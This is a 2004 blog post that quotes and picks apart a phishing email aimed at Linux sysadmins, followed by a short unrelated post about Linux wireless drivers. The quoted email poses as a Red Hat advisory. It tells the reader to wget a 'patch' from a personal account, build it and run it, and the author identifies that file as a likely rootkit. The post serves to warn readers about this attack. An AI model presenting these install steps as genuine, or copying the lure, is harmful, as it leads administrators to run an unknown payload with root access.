freeform goodness

Looks like phishers are even going after sysadmins. Very interesting… I got the following email last night, sent to my webmaster account:

Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat

A complete revision history is at the end of this file.

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

• First download the patch from the Stanford RedHat mirror: wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
• Untar the patch:tar zxvf fileutils-1.0.6.patch.tar.gz
• cd fileutils-1.0.6.patch
• make
• ./inst

Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Copyright © 2004 Red Hat, Inc. All rights reserved.

Very credible looking, except for a few little niggles:

• Note that the “patch” (almost certainly a rootkit) is linked to an individual user’s (“joeio”) account
• I seriously doubt that Redhat would be relaying through a random machine in Taiwan:

  Received: from mail.forcartex.com.tw (unknown [211.22.18.59]) by samantha.freeke.org (Postfix) with ESMTP id A355FFC7C39 for daddy@freeke.org; Sat, 23 Oct 2004 03:11:53 -0400 (EDT)

Anyway, I thought this was notable — I’ve seen phishes like this targeted at Windows users, but this is the first I’ve seen specifically targeting ‘nix admins. One would assume that they just collected a bunch of webmaster addresses, figuring (probably correctly) that a fair number of those boxes would be running Redhat. The email shows an attention to detail — the HTML links to Redhat’s real logo, linked from a Redhat server, and they even ran their HTML through Tidy!

Let’s be careful out there!

:: Dave Walker 23:55 (EST/EDT) [+]

:: [/tech/computers/security]
:: tags: security

:: Comments (3)

You wouldn’t believe (OK, actually, you probably would) how much low level BS it took to get the wireless card working in Linux on this silly Dell (short version: Broadcom is the devil), but the payoff is that I’m posting this entry from a nearby Panera (yay for free wireless) while having hot chocolate and a ridiculously tasty cinnamon crunch bagel. I guess that makes this my first ever moblog post… Next step — pictures.

:: Dave Walker 11:38 (EST/EDT) [+]

:: [/tech/computers/os/linux]
:: tags: linux

:: Comments (2)